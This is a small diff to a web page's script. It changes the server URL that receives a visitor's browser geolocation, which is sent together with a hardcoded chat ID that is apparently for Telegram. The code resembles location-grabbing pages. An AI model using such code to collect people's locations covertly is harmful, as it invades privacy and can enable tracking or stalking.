--- a/index.html
+++ b/index.html
@@ -26,8 +26,8 @@
                         const latitude = position.coords.latitude;
                         const longitude = position.coords.longitude;
 
-                        // Send location data to server-side script
-                        const url = 'https://example.com/sendLocation'; // Replace with your server-side URL
+                        // Replace with your server-side URL
+                        const url = 'https://yourserver.com/sendLocation'; 
                         const data = {
                             chatId: '5112680061',
                             latitude: latitude,
